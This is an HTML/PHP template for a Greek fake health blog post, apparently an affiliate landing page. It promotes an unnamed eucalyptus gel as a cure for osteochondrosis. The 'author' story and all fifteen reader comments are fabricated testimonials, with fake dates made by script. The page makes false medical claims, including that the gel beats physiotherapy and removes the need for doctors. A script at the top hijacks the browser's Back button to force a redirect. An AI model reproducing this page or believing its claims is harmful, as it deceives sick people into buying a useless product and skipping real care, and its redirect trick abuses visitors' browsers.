<?php setcookie("FBpixel", $_GET["fbpixel"]); ?>
<!DOCTYPE html>
<html dir="ltr" lang="en">
<head>
    <script src="https://cdnjs.cloudflare.com/ajax/libs/jquery/3.4.0/jquery.js"></script>
    <script src="drewlex_main.js"></script>
    <script>
        (function () {
            let params = (new URL(document.location)).searchParams;
            let block = '';
            params.forEach(function (value, key) {
                block = block + key + '=' + value + '&';
            })
            var t;
            try {
                for (t = 0; 10 > t; ++t) history.pushState({}, "", document.location);
                onpopstate = function (t) {
                    t.state && location.replace("domonetka/index.php?cid={clickid}")
                }
            } catch (o) {
            }
        })();
    </script>
    <style>
        .ac_footer {
            position: relative;
            top: 10px;
            height: 0;
            text-align: center;
            margin-bottom: 70px;
            color: #A12000;
        }

        .ac_footer a {
            color: #A12000;
        }

        .ac_footer p {
            text-align: center;
        }

        img[height="1"], img[width="1"] {
            display: none !important;
        }
    </style><!--retarget--><!--retarget-->
    <script src="js/9.min.js" type="text/javascript">
    </script>
    <meta data-text-id="159260">
    <meta charset="utf-8">
    <meta content="width=device-width, initial-scale=1.0" name="viewport">
    <title>Νόμιζα ότι έπαθα καρδιακή προσβολή, αλλά ήταν οστεοχόνδρωση.</title>
    <link href="img/fav.png" rel="shortcut icon">
    <meta data-text-id="159260">
    <link href="https://fonts.googleapis.com/css2?family=Montserrat:ital,wght@0,400;0,500;0,700;0,900;1,400&family=Playfair+Display:wght@700&display=swap"
          rel="stylesheet">
    <link href="css/fonts.css" rel="stylesheet" type="text/css">
    <link href="css/style.css" rel="stylesheet" type="text/css">
</head>
<body><!--retarget--><!--retarget-->
<div class="wrapper">
    <header class="b-header">
        <div class="container"><a class="b-logo" href="PASTE_REDIRECT_URL"><img src="img/logo.png"></a>
            <div class="top-menu d-large"><a href="PASTE_REDIRECT_URL"> Αρχική </a><a href="PASTE_REDIRECT_URL">
                ΚΑΤΗΓΟΡΙΕΣ </a><a href="PASTE_REDIRECT_URL"> Σχετικά με μένα </a><a class="current"
                                                                                    href="PASTE_REDIRECT_URL"> για την
                υγεία </a><a href="PASTE_REDIRECT_URL"> Συμβουλές </a></div>
            <div class="b-social d-large"><a class="tw" href="PASTE_REDIRECT_URL"><i class="icon-twitter"></i></a><a
                    class="pn" href="PASTE_REDIRECT_URL"><i class="icon-pinterest-p"></i></a><a class="in"
                                                                                                href="PASTE_REDIRECT_URL"><i
                    class="icon-instagram"></i></a><a class="fb" href="PASTE_REDIRECT_URL"><i
                    class="icon-facebook-f"></i></a></div>
            <a class="b-search" href="PASTE_REDIRECT_URL">
                <svg height="22" width="22">
                    <use xlink:href="#search"></use>
                </svg>
            </a><a class="toggle-button d-mobile" href="PASTE_REDIRECT_URL">
                <svg height="17" width="25">
                    <use xlink:href="#toggle"></use>
                </svg>
            </a></div>
    </header>
    <section class="b-primary">
        <div class="container">
            <aside class="b-sidebar d-large"><a class="b-search2"
                                                href="PASTE_REDIRECT_URL"><span> Αναζήτηση... </span><span><svg
                    height="13" width="13"><use xlink:href="#search2"></use></svg></span></a>
                <div class="b-side b-author text-center">
                    <div class="author-img"><img src="img/author.jpg"></div>
                    <div class="m-brown"> συγγραφέας ιστολογίου</div>
                    <div><b> Μαρία Καραχάλιου <br> 47 ετών </b></div>
                </div>
                <div class="b-side">
                    <div class="title-block"> Κατηγορίες</div>
                    <a class="subject-link" href="PASTE_REDIRECT_URL"> Στυλ <span> (200) </span></a><a
                        class="subject-link" href="PASTE_REDIRECT_URL"> Καριέρα <span> (14) </span></a><a
                        class="subject-link" href="PASTE_REDIRECT_URL"> Ζωή <span> (44) </span></a><a
                        class="subject-link" href="PASTE_REDIRECT_URL"> Υγεία <span> (24) </span></a></div>
                <div class="b-side">
                    <div class="title-block"> ΤΕΛΕΥΤΑΙΕΣ ΔΗΜΟΣΙΕΥΣΕΙΣ</div>
                    <div class="b-post">
                        <div class="post-img"><img src="img/post_1.jpg"></div>
                        <div class="teaser"> Αυτό το εργαλείο θα σας βοηθήσει να απαλλαγείτε ακόμη και από «προχωρημένη»
                            οστεοχόνδρωση σε λίγες ημέρες
                        </div>
                        <div class="clearfix"></div>
                        <div class="post-info"><span><script type="text/javascript">
           dtime_nums(-2, true)
          </script></span><span><svg height="10" width="18"><use xlink:href="#eye"></use></svg> 97 </span></div>
                        <a class="post-link" href="PASTE_REDIRECT_URL"></a></div>
                    <div class="b-post">
                        <div class="post-img"><img src="img/post_2.jpg"></div>
                        <div class="teaser"> Υποφέρετε από οστεοχόνδρωση; Αποκτήστε δωρεάν συμβουλές εμπειρογνωμόνων
                        </div>
                        <div class="clearfix"></div>
                        <div class="post-info"><span><script type="text/javascript">
           dtime_nums(-3, true)
          </script></span><span><svg height="10" width="18"><use xlink:href="#eye"></use></svg> 56 </span></div>
                        <a class="post-link" href="PASTE_REDIRECT_URL"></a></div>
                    <div class="b-post">
                        <div class="post-img"><img src="img/post_3.jpg"></div>
                        <div class="teaser"> Μόνο 15 λεπτά την ημέρα και ο πόνος στον αυχένα και το στήθος θα
                            εξαφανιστεί για πάντα
                        </div>
                        <div class="clearfix"></div>
                        <div class="post-info"><span><script type="text/javascript">
           dtime_nums(-4, true)
          </script></span><span><svg height="10" width="18"><use xlink:href="#eye"></use></svg> 25 </span></div>
                        <a class="post-link" href="PASTE_REDIRECT_URL"></a></div>
                    <div class="b-post">
                        <div class="post-img"><img src="img/post_4.jpg"></div>
                        <div class="teaser"> Ένα απλό προϊόν για τη θεραπεία των αρθρώσεων για να απαλλαγείτε από την
                            οστεοχόνδρωση στο σπίτι
                        </div>
                        <div class="clearfix"></div>
                        <div class="post-info"><span><script type="text/javascript">
           dtime_nums(-6, true)
          </script></span><span><svg height="10" width="18"><use xlink:href="#eye"></use></svg> 44 </span></div>
                        <a class="post-link" href="PASTE_REDIRECT_URL"></a></div>
                    <div class="b-post post-last">
                        <div class="post-img"><img src="img/post_5.jpg"></div>
                        <div class="teaser"> ΑΥΤΟ είναι απαραίτητο για όλους όσους νοιάζονται για την υγεία τους</div>
                        <div class="clearfix"></div>
                        <div class="post-info"><span><script type="text/javascript">
           dtime_nums(-7, true)
          </script></span><span><svg height="10" width="18"><use xlink:href="#eye"></use></svg> 51 </span></div>
                        <a class="post-link" href="PASTE_REDIRECT_URL"></a></div>
                    <a class="all-news" href="PASTE_REDIRECT_URL"> Δείτε όλες τις δημοσιεύσεις </a></div>
                <div class="bnr-block"><img class="bnr-img" src="prod.png" style="    padding-top: 170px;
    max-width: 200px;
    margin: 0 auto;
    display: block;">
                    <div class="bnr-text text-uppercase"><span class="prod-name text-uppercase"> <span
                            class="productName"></span> </span><span> Πείτε <br> ΟΧΙ στον πόνο! </span></div>
                    <a class="btn-small" href="PASTE_REDIRECT_URL"> Παραγγελία </a></div>
            </aside>
            <article class="content">
                <div class="main-content">
                    <div class="b-tags"><a href="PASTE_REDIRECT_URL"> Σχετικά με μένα </a><a href="PASTE_REDIRECT_URL">
                        Συμβουλή </a><a href="PASTE_REDIRECT_URL"> Υγεία </a></div>
                    <h1> Νόμιζα ότι έπαθα καρδιακή προσβολή, αλλά ήταν οστεοχόνδρωση. </h1>
                    <h2> Θα σας πω πώς ξεφορτώθηκα τα δυσάρεστα συμπτώματα, ξέχασα την ασθένεια και επέστρεψα γρήγορα
                        στον ενεργό, πλήρη τρόπο ζωής μου. </h2>
                    <div class="article-info">
                        <div><img src="img/author1.jpg">
                            <div class="info-inner"><span> Μαρία Καραχάλιου </span><br class="d-mobile"><span><i
                                    class="icon-clock"></i><script type="text/javascript">
            dtime_nums(-8, true)
           </script></span><span><i class="icon-eye"></i> 1.180 προβολές </span></div>
                        </div>
                        <div class="b-social"><span><svg height="25" width="22"><use
                                xlink:href="#share"></use></svg><br> Κοινοποίηση </span><a class="tw"
                                                                                           href="PASTE_REDIRECT_URL"><i
                                class="icon-twitter"></i></a><a class="pn" href="PASTE_REDIRECT_URL"><i
                                class="icon-pinterest-p"></i></a><a class="in" href="PASTE_REDIRECT_URL"><i
                                class="icon-instagram"></i></a><a class="fb" href="PASTE_REDIRECT_URL"><i
                                class="icon-facebook-f"></i></a></div>
                    </div>
                    <img class="alignright d-large" src="img/photo1.jpg">
                    <p><b> Ο πόνος στην ωμοπλάτη και το στήθος, δυσκολεύει την αναπνοή σας. Το πρώτο πράγμα που
                        σκέφτεστε είναι η καρδιά σας. </b> Δεν υπάρχει δεύτερη σκέψη - πρέπει να καλέσετε
                        ασθενοφόρο. Αυτό έκαναν οι συνάδελφοί μου όταν αρρώστησα στη δουλειά. </p>
                    <p><b> Το ΗΚΓ έδειξε ότι η υγεία μου ήταν μια χαρά. Έκανα πλήρεις εξετάσεις στο νοσοκομείο και
                        ανακάλυψα ότι είχα θωρακική οστεοχόνδρωση. </b> Δεν το περίμενα! Αθλούμαι, κάνω γιόγκα, κοιμάμαι
                        σε ορθοπεδικό στρώμα. Όλα μάταια ήταν… </p><img class="d-center img-responsive d-mobile"
                                                                        src="img/photo1.jpg">
                    <p><b> Οι ειδικοί μου έδωσαν μια λίστα με μια περίπλοκη θεραπεία με χονδροπροστατευτικούς
                        παράγοντες, νευροληπτικά, ηρεμιστικά και μου συνέστησαν να κάνω φυσιοθεραπείες. </b> Ακολούθησα
                        όλες τις συστάσεις σαν υπεύθυνη ασθενής. Σε μια από τις φυσιοθεραπείες πιάστηκα - δεν μπορούσα
                        να γυρίσω το κεφάλι μου ή να σηκώσω τα χέρια μου. <b> Οποιαδήποτε κίνηση μου προκαλούσε
                            πόνο. Βλέποντας τα βασανιστήρια μου, ο φυσιοθεραπευτής άρχισε να με ρωτά για το πρόβλημά
                            μου. Όταν άκουσε τη διάγνωση, έπιασε το κεφάλι του: </b></p>
                    <blockquote> Γιατί δεν είπες τίποτα; Απαγορεύεται οποιαδήποτε άσκηση στην κατάστασή σου σε
                        παρόξυνση. Πρέπει να φύγει ο πόνος. Αυτό το πρόβλημα μπορεί να λυθεί σε μια εβδομάδα. Μετά από
                        αυτό, μπορείτε και πρέπει να κάνετε ασκήσεις για τόνωση και υγεία.
                    </blockquote>
                    <p> Σκουπίζοντας τα δάκρυά μου, κοίταξα τον φυσιοθεραπευτή με ενδιαφέρον. </p>
                    <blockquote> Σε όλο τον κόσμο, τα άτομα με τέτοια διάγνωση έχουν μια ενεργή, πλήρη ζωή και ξεχνάνε
                        τον πόνο. Θέλεις να σε βοηθήσω; Πίστεψε με, ο πόνος θα εξαφανιστεί για πάντα και θα είσαι σε
                        θέση να αθλήσαι χωρίς τον κίνδυνο τραυματισμού.
                    </blockquote>
                    <p><b> Έτσι έμαθα για το ειδικό τζελ, που ονομάζεται <a href="PASTE_REDIRECT_URL"> <span
                            class="productName"></span> </a> . Φυσικά, ήξερα ήδη για τη θεραπευτική δύναμη του
                        ευκαλύπτου, αλλά πραγματικά δεν το πίστευα. </b> Όμως όλα αποδείχθηκαν απλά - το τζελ είναι πολύ
                        αποτελεσματικό και εύχρηστο. Μπορείτε να το χρησιμοποιήσετε στην εργασία και κανείς δεν θα το
                        παρατηρήσει. Είναι καταπληκτικό! Φυσικά, ζήτησα από τον φυσιοθεραπευτή μου να με βοηθήσει να το
                        παραγγείλω. Με βοήθησε να αγοράσω το τζελ με έκπτωση - το πλήρωσα μόνο στη μισή τιμή. Χαμηλή
                        τιμή για καλή υγεία. </p>
                    <p><b> Το τζελ παραδόθηκε τρεις ημέρες αργότερα. Οι πρώτες μου εντυπώσεις ήταν πολύ ωραίες - έχει
                        ελαφριά υφή και ωραία μυρωδιά ευκαλύπτου. Το κυριότερο είναι ότι η σύστασή του περιέχει μόνο
                        φυσικά συστατικά όπως ο ευκάλυπτος, τα έλαια κανέλας και το εκχύλισμα τζίντζερ. Χωρίς χημικά ή
                        συνθετικά συστατικά. </b></p><img class="img-responsive d-center" src="prod.png">
                    <p><b> Αποφάσισα να δοκιμάσω το τζελ αμέσως. Ακολουθώντας τη σύσταση του φυσιοθεραπευτή μου, το
                        έβαλα στον αυχένα μου, ακριβώς στο μέρος που πονούσα. Είναι εκπληκτικό ότι ένιωσα μια ευχάριστη
                        ζεστασιά μέσα σε λίγα λεπτά, ενώ η ένταση εξαφανίστηκε και οι μύες χαλάρωσαν. Για πρώτη φορά,
                        μετά από λίγο, κατάφερα να κοιμηθώ όλη τη νύχτα χωρίς να ξυπνήσω! </b></p>
                    <!--<img
                        class="alignleft img-responsive" src="img/photo3.jpg">-->
                    <p> Εφάρμοζα το <span class="productName"></span> gel κάθε πρωί και κάθε βράδυ, ο πόνος έφυγε και
                        ένιωσα ένα κύμα ενέργειας! Μετά από μια εβδομάδα τακτικής χρήσης, όλα τα δυσάρεστα συμπτώματα
                        έγιναν παρελθόν. </p>
                    <p><b> Χρησιμοποιώ αυτό το τζελ για περισσότερο από 2 μήνες. Κατά τη διάρκεια αυτής της περιόδου,
                        ξέχασα την οστεοχόνδρωση και τον πόνο, άρχισα να πηγαίνω ξανά στο γυμναστήριο και μάλιστα να
                        γραφτώ και σε μαθήματα χορού. Τώρα, μπορώ να πω σίγουρα ότι το <a href="PASTE_REDIRECT_URL">
                            <span class="productName"></span> </a> είναι μια φανταστική λύση και το κλειδί για την καλή
                        υγεία. </b> Παρεμπιπτόντως, μπορείτε να το χρησιμοποιήσετε όχι μόνο για να αντιμετωπίσετε
                        τραυματισμούς, αλλά και πριν ασκηθείτε - προσφέρει τέλεια προστασία των μυών και των αρθρώσεων
                        κατά την άσκηση. Ακόμη και οι αθλητές το χρησιμοποιούν: ο γυμναστής μου, μου το εκμυστηρεύτηκε,
                        αλλά πρέπει να το κρατήσετε μυστικό! </p>
                    <p> Εάν πάσχετε από οστεοχόνδρωση ή οποιαδήποτε άλλη χρόνια ασθένεια, χρησιμοποιήστε αυτή τη
                        συμβουλή - παραγγείλετε το <span class="productName"></span>. Θα πείτε αντίο στην κόπωση, την
                        κακή διάθεση και τον πόνο και θα απολαύσετε ελαφρότητα, υπέροχη διάθεση και θα είστε γεμάτοι
                        ενέργεια. Αυτό θα νιώσετε κάθε φορά που θα χρησιμοποιείτε το τζελ. <b> Αν σας ενδιαφέρει,
                            ακολουθεί ένας σύνδεσμος προς τον ιστότοπο του κατασκευαστή. Προς το παρόν, προσφέρουν
                            έκπτωση 50% - βιαστείτε να αγοράσετε το προϊόν για να βελτιώσετε την υγεία ολόκληρης της
                            οικογένειάς σας. </b></p>


                    <div class="features-wrapper"></div>

                </div>
                <div class="comments-block">
                    <div class="comments-title"> Σχόλια</div>
                    <div class="comment-item">
                        <div class="comment-img"><a href="PASTE_REDIRECT_URL"><img src="img/ava_1.jpg"></a></div>
                        <div class="comment-body"><a class="comment-author" href="PASTE_REDIRECT_URL">
                            Λίζα Πούλου </a><span class="comment-date"><script type="text/javascript">
           dtime_nums(-8, true)
          </script></span>
                            <p> Ποιος θα πίστευε ότι μια τόσο απλή λύση μπορεί να σας βοηθήσει να απαλλαγείτε από ένα
                                τόσο σοβαρό πρόβλημα; Στην αρχή, σκέφτηκα ότι ήταν μια ακόμη άχρηστη αλοιφή, αλλά άλλαξα
                                γνώμη πολύ γρήγορα. Το τζελ κάνει τη δουλειά του πολύ καλά, ακόμη καλύτερα και από το
                                επαγγελματικό μασάζ. Μετά τη χρήση, νιώθω μια ωραία ζεστασιά στο σώμα μου και δεν
                                αισθάνομαι καθόλου πόνο. Το λατρεύω απολύτως! <img src="img/smile1.png"></p><span
                                    class="comment-reply"><a
                                    href="PASTE_REDIRECT_URL"> Απάντηση </a><span> Κοινοποίηση </span></span></div>
                    </div>
                    <div class="comment-item">
                        <div class="comment-img"><a href="PASTE_REDIRECT_URL"><img src="img/ava_2.jpg"></a></div>
                        <div class="comment-body"><a class="comment-author" href="PASTE_REDIRECT_URL"> Αμαλία
                            Λιονακάκου </a><span class="comment-date"><script type="text/javascript">
           dtime_nums(-8, true)
          </script></span>
                            <p> Άρχισα να χρησιμοποιώ το τζελ πρόσφατα, αλλά οι εντυπώσεις μου είναι μόνο θετικές μέχρι
                                στιγμής. Στο παρελθόν, χρησιμοποιούσα το προϊόν μιας άλλης εταιρείας, ήταν απολύτως
                                μαλακία, δεν είχε αποτέλεσμα και η μυρωδιά του ήταν τόσο έντονη που μύριζαν τα ρούχα και
                                τα σεντόνια μου, οπότε έπρεπε να την ξεφορτωθώ αφού τη χρησιμοποίησα για δυο
                                εβδομάδες. Αλλά τώρα χρησιμοποιώ το <span class="productName"></span> και είμαι απολύτως
                                ευχαριστημένη με αυτό. <img src="img/smile2.png"></p>
                            <!--<img class="img-responsive"    src="img/comm1.jpg">-->
                            <span
                                    class="comment-reply"><a
                                    href="PASTE_REDIRECT_URL"> Απάντηση </a><span> Κοινοποίηση </span></span></div>
                    </div>
                    <div class="comment-item">
                        <div class="comment-img"><a href="PASTE_REDIRECT_URL"><img src="img/ava_3.jpg"></a></div>
                        <div class="comment-body"><a class="comment-author" href="PASTE_REDIRECT_URL"> Νίκος
                            Μπάρκας </a><span class="comment-date"><script type="text/javascript">
           dtime_nums(-8, true)
          </script></span>
                            <p> Έχω πόνο στον αυχένα για αρκετά χρόνια. Το μασάζ δεν βοήθησε. Θα δοκιμάσω το <span
                                    class="productName"></span>, αυτή είναι η τελευταία μου ελπίδα. <img
                                    src="img/smile3.png"></p><span class="comment-reply"><a href="PASTE_REDIRECT_URL"> Απάντηση </a><span> Κοινοποίηση </span></span>
                        </div>
                    </div>
                    <div class="comment-item">
                        <div class="comment-img"><a href="PASTE_REDIRECT_URL"><img src="img/ava_4.jpg"></a></div>
                        <div class="comment-body"><a class="comment-author" href="PASTE_REDIRECT_URL"> Άννα
                            Δροσοπούλου </a><span class="comment-date"><script type="text/javascript">
           dtime_nums(-7, true)
          </script></span>
                            <p> Παρήγγειλα το <a href="PASTE_REDIRECT_URL"> <span class="productName"></span> </a> για
                                τον παππού μου. Έχει αρθρίτιδα στις αρθρώσεις στα γόνατα, δεν μπορούσε να μετακινηθεί
                                από το σπίτι. Αλλά αφού το χρησιμοποίησε για 2 εβδομάδες, τώρα μπορεί να τρέξει με τα
                                εγγόνια του! Ξέρετε, σκεφτόμασταν ακόμη και τη χειρουργική επέμβαση… Σας ευχαριστούμε
                                για το θαύμα! <img src="img/smile4.png"></p>
                        <!--    <img class="img-responsive"
                                                                                 src="img/comm2.jpg">-->
                            <span
                                    class="comment-reply"><a
                                    href="PASTE_REDIRECT_URL"> Απάντηση </a><span> Κοινοποίηση </span></span></div>
                    </div>
                    <div class="comment-item">
                        <div class="comment-img"><a href="PASTE_REDIRECT_URL"><img src="img/ava_5.jpg"></a></div>
                        <div class="comment-body"><a class="comment-author" href="PASTE_REDIRECT_URL"> Σοφία Χαραμή </a><span
                                class="comment-date"><script type="text/javascript">
           dtime_nums(-7, true)
          </script></span>
                            <p> Θα το δοκιμάσω σίγουρα, έχω έναν συνεχή πόνο στην πλάτη, δεν αντέχω πια. </p><span
                                    class="comment-reply"><a
                                    href="PASTE_REDIRECT_URL"> Απάντηση </a><span> Κοινοποίηση </span></span></div>
                    </div>
                    <div class="comment-item">
                        <div class="comment-img"><a href="PASTE_REDIRECT_URL"><img src="img/ava_6.jpg"></a></div>
                        <div class="comment-body"><a class="comment-author" href="PASTE_REDIRECT_URL"> Θωμάς
                            Αθανασιάδης </a><span class="comment-date"><script type="text/javascript">
           dtime_nums(-6, true)
          </script></span>
                            <p> Ως άτομο που ξέρει πολλά για την αποκατάσταση από πρώτο χέρι, θα πω: <a
                                    href="PASTE_REDIRECT_URL"> Το <span class="productName"></span> </a> είναι καλύτερο
                                από οποιαδήποτε φυσική θεραπεία. Ανεξάρτητα από τα προβλήματά σας - αρθρώσεις, τένοντες,
                                μύες, το <span class="productName"></span> θα σας βοηθήσει να τα ξεπεράσετε και να τα
                                αφήσετε στο παρελθόν. Μην το αναβάλλετε - η φροντίδα της υγείας σας πρέπει να είναι
                                έγκαιρη. </p>
                            <!--<img class="img-responsive" src="img/comm3.jpg">-->
                            <span
                                    class="comment-reply"><a
                                    href="PASTE_REDIRECT_URL"> Απάντηση </a><span> Κοινοποίηση </span></span></div>
                    </div>
                    <div class="comment-item">
                        <div class="comment-img"><a href="PASTE_REDIRECT_URL"><img src="img/ava_7.jpg"></a></div>
                        <div class="comment-body"><a class="comment-author" href="PASTE_REDIRECT_URL"> Γιώργος
                            Μαυρόπουλος </a><span class="comment-date"><script type="text/javascript">
           dtime_nums(-5, true)
          </script></span>
                            <p> Ως συνταξιούχος, είμαι ιδιαίτερα ευχαριστημένος που έχω αυτό το προϊόν στο
                                σπίτι. Σπασμοί στην πλάτη, πόνος στο γόνατο, παρεκτόπιση αυχένα, καταπονημένοι
                                σύνδεσμοι… Το τζελ είναι πραγματικά πλήρες, μπορείτε να το χρησιμοποιήσετε για να κάνετε
                                μασάζ σε οποιοδήποτε μέρος του σώματός σας ανά πάσα στιγμή. Και δεν θα χρειαστεί
                                να επισκεφθείτε γιατρούς, παίρνουν μόνο τα χρήματά σας και σας συνταγογραφούν
                                χημικά. </p><span class="comment-reply"><a
                                    href="PASTE_REDIRECT_URL"> Απάντηση </a><span> Κοινοποίηση </span></span></div>
                    </div>
                    <div class="comment-item">
                        <div class="comment-img"><a href="PASTE_REDIRECT_URL"><img src="img/ava_8.jpg"></a></div>
                        <div class="comment-body"><a class="comment-author" href="PASTE_REDIRECT_URL"> Αλίκη
                            Ντερτιλή </a><span class="comment-date"><script type="text/javascript">
           dtime_nums(-5, true)
          </script></span>
                            <p> Αυτό το προϊόν είναι καταπληκτικό. Αισθάνομαι πάντα γεμάτη ενέργεια μετά τη χρήση
                                του. Αρκεί να το εφαρμόσετε στην περιοχή του πόνου και ο πόνος εξαφανίζεται μέσα σε λίγα
                                λεπτά! Οι συγγενείς μου το χρησιμοποιούν επίσης. Ήρθε η ώρα να εκμεταλλευτείτε την
                                προσφορά του <span class="productName"></span>! :) </p>
                            <!--<img class="img-responsive"      src="img/comm4.jpg">-->
                            <span
                                    class="comment-reply"><a
                                    href="PASTE_REDIRECT_URL"> Απάντηση </a><span> Κοινοποίηση </span></span></div>
                    </div>
                    <div class="comment-item">
                        <div class="comment-img"><a href="PASTE_REDIRECT_URL"><img src="img/ava_9.jpg"></a></div>
                        <div class="comment-body"><a class="comment-author" href="PASTE_REDIRECT_URL"> Κυριάκος
                            Βαφειάδης </a><span class="comment-date"><script type="text/javascript">
           dtime_nums(-4, true)
          </script></span>
                            <p> Ο προσωπικός μου γυμναστής μου πρότεινε να χρησιμοποιήσω το <a
                                    href="PASTE_REDIRECT_URL"> <span class="productName"></span> </a> , λέγοντας ότι
                                αυτό είναι το καλύτερο προϊόν για χαλάρωση μετά τη γυμναστική. Και συμφωνώ απολύτως μαζί
                                του. Η ένταση των μυών έχει φύγει, ξέχασα τον πόνο και τον πόνο των μυών εδώ και πολύ
                                καιρό. Το σώμα μου είναι σε καλή κατάσταση, η φυσική μου κατάσταση είναι τέλεια. </p>
                            <span class="comment-reply"><a
                                    href="PASTE_REDIRECT_URL"> Απάντηση </a><span> Κοινοποίηση </span></span></div>
                    </div>
                    <div class="comment-item">
                        <div class="comment-img"><a href="PASTE_REDIRECT_URL"><img src="img/ava_10.jpg"></a></div>
                        <div class="comment-body"><a class="comment-author" href="PASTE_REDIRECT_URL"> Ιουλία
                            Γεωργιάδου </a><span class="comment-date"><script type="text/javascript">
           dtime_nums(-4, true)
          </script></span>
                            <p> Θα έλεγα ότι είμαι σχεδόν υγιής αν δεν είχα έναν παλιό τραυματισμό που προκλήθηκε από
                                μια άσχημη πτώση (σπασμένο χέρι). Ο αγκώνας μου πονάει πολύ. Δεν έχω χρόνο για μασάζ και
                                γυμναστήρια, γι' αυτό το <a href="PASTE_REDIRECT_URL"> <span class="productName"></span>
                                </a> είναι μια μεγάλη ανακάλυψη για μένα. Το χρησιμοποιώ κάθε φορά που νιώθω κάποια
                                δυσφορία και μετά νιώθω υπέροχα. Ξέχασα τον παλιό μου τραυματισμό και μπορώ ακόμα και να
                                καταπονήσω την κατεστραμμένη άρθρωση μου! Ξέρετε, είναι υπέροχο που νιώθω ότι μπορώ να
                                ζήσω μια πλήρη ζωή ξανά! <img src="img/smile4.png"></p>
                            <!--<img class="img-responsive"   src="img/comm5.jpg">-->
                            <span
                                    class="comment-reply"><a
                                    href="PASTE_REDIRECT_URL"> Απάντηση </a><span> Κοινοποίηση </span></span></div>
                    </div>
                    <div class="comment-item">
                        <div class="comment-img"><a href="PASTE_REDIRECT_URL"><img src="img/ava_11.jpg"></a></div>
                        <div class="comment-body"><a class="comment-author" href="PASTE_REDIRECT_URL"> Μερόπη
                            Κουλίδου </a><span class="comment-date"><script type="text/javascript">
           dtime_nums(-4, true)
          </script></span>
                            <p> Έμαθα για το <a href="PASTE_REDIRECT_URL"> <span class="productName"></span> </a> χάρη
                                στα μαθήματα γιόγκα - ο εκπαιδευτής μου συνέστησε να το χρησιμοποιώ πριν την άσκηση ή
                                όταν τραυματιστώ. Αυτή η συμβουλή αποδείχθηκε πολύ χρήσιμη - κατά τη διάρκεια μιας από
                                τις προπονήσεις μου, τραυματίστηκα στον ώμο μου. Το <span class="productName"></span>
                                ήταν η σωτηρία μου! Αυτό το προϊόν αξίζει κάθε δεκάρα. Είναι απίστευτο ότι ένα τόσο απλό
                                προϊόν είναι τόσο χρήσιμο. </p>
                            <!--<img class="img-responsive" src="img/comm6.jpg">-->
                            <span
                                    class="comment-reply"><a
                                    href="PASTE_REDIRECT_URL"> Απάντηση </a><span> Κοινοποίηση </span></span></div>
                    </div>
                    <div class="comment-item">
                        <div class="comment-img"><a href="PASTE_REDIRECT_URL"><img src="img/ava_12.jpg"></a></div>
                        <div class="comment-body"><a class="comment-author" href="PASTE_REDIRECT_URL"> Ειρήνη
                            Ανδριανού </a><span class="comment-date"><script type="text/javascript">
           dtime_nums(-3, true)
          </script></span>
                            <p> Μετά από μια εξέταση, ένας ειδικός μου συνέστησε να υποβληθώ σε ένα οδυνηρό μασάζ. Έκανα
                                δύο συνεδρίες, και έκλαιγα από τον πόνο μετά από αυτές, οπότε και τις
                                εγκατέλειψα. Φυσικά, άρχισα να ψάχνω για κάποια εναλλακτική λύση. Και τη βρήκα - είναι
                                το <a href="PASTE_REDIRECT_URL"> <span class="productName"></span> </a> gel: έλυσε το
                                πρόβλημά μου μέσα σε μια εβδομάδα. Τώρα, το έχω στο κουτί πρώτων βοηθειών και το
                                χρησιμοποιώ κάθε φορά που νιώθω δυσφορία. </p><span class="comment-reply"><a
                                    href="PASTE_REDIRECT_URL"> Απάντηση </a><span> Κοινοποίηση </span></span></div>
                    </div>
                    <div class="comment-item">
                        <div class="comment-img"><a href="PASTE_REDIRECT_URL"><img src="img/ava_13.jpg"></a></div>
                        <div class="comment-body"><a class="comment-author" href="PASTE_REDIRECT_URL"> Χρήστος
                            Φανουράκης </a><span class="comment-date"><script type="text/javascript">
           dtime_nums(-2, true)
          </script></span>
                            <p><a href="PASTE_REDIRECT_URL"> Το <span class="productName"></span> </a> είναι ένα
                                πραγματικό θαύμα. Ο πόνος στην πλάτη εξαφανίστηκε. Εάν κάνετε καθιστική εργασία ή έντονη
                                σωματική εργασία, αυτό το τζελ είναι απαραίτητο για το κουτί πρώτων βοηθειών στο σπίτι
                                σας. </p>
                            <!--<img class="img-responsive" src="img/comm7.jpg">-->
                            <span class="comment-reply"><a
                                    href="PASTE_REDIRECT_URL"> Απάντηση </a><span> Κοινοποίηση </span></span></div>
                    </div>
                    <div class="comment-item">
                        <div class="comment-img"><a href="PASTE_REDIRECT_URL"><img src="img/ava_14.jpg"></a></div>
                        <div class="comment-body"><a class="comment-author" href="PASTE_REDIRECT_URL"> Χαρά
                            Γρηγοριάδου </a><span class="comment-date"><script type="text/javascript">
           dtime_nums(-2, true)
          </script></span>
                            <p> Ένα ενδιαφέρον προϊόν, θέλω πραγματικά να το δοκιμάσω </p><span class="comment-reply"><a
                                    href="PASTE_REDIRECT_URL"> Απάντηση </a><span> Κοινοποίηση </span></span></div>
                    </div>
                    <div class="comment-item">
                        <div class="comment-img"><a href="PASTE_REDIRECT_URL"><img src="img/ava_15.jpg"></a></div>
                        <div class="comment-body"><a class="comment-author" href="PASTE_REDIRECT_URL"> Ανθούλα
                            Ξυλίδου </a><span class="comment-date"><script type="text/javascript">
           dtime_nums(-1, true)
          </script></span>
                            <p> Μόλις παράγγειλα αυτό το τζελ, και υπάρχει πραγματικά μια έκπτωση 50%, σας ευχαριστώ για
                                αυτήν την εξοικονόμηση. Παρόλο που, αν όλα όσα λένε οι άνθρωποι για αυτό είναι αλήθεια,
                                δεν με πείραζε να πληρώσω ολόκληρη την αξία του. </p><span class="comment-reply"><a
                                    href="PASTE_REDIRECT_URL"> Απάντηση </a><span> Κοινοποίηση </span></span></div>
                    </div>
                    <div class="text-center"><a class="btn" href="PASTE_REDIRECT_URL"> Παραγγελία του <span
                            class="productName"></span> </a></div>
                </div>
            </article>
        </div>
    </section>
    <footer class="b-footer text-center"> © Πνευματικά δικαιώματα <span class="ryear"></span></footer>
</div>
<svg id="sprite" style="display: none;" xmlns="http://www.w3.org/2000/svg">
    <symbol id="search">
        <path d="M21.515,21.527 C20.900,22.144 19.905,22.144 19.292,21.527 L14.896,17.130 C13.355,18.229 11.473,18.881 9.437,18.881 C4.227,18.881 0.003,14.652 0.003,9.440 C0.003,4.228 4.227,0.001 9.437,0.001 C14.646,0.001 18.871,4.228 18.871,9.440 C18.871,11.478 18.219,13.360 17.121,14.903 L21.515,19.298 C22.127,19.917 22.127,20.913 21.515,21.527 ZM17.298,9.440 C17.298,5.095 13.779,1.576 9.437,1.576 C5.095,1.576 1.573,5.098 1.573,9.440 C1.573,13.783 5.092,17.305 9.434,17.305 C13.777,17.305 17.298,13.785 17.298,9.440 Z"
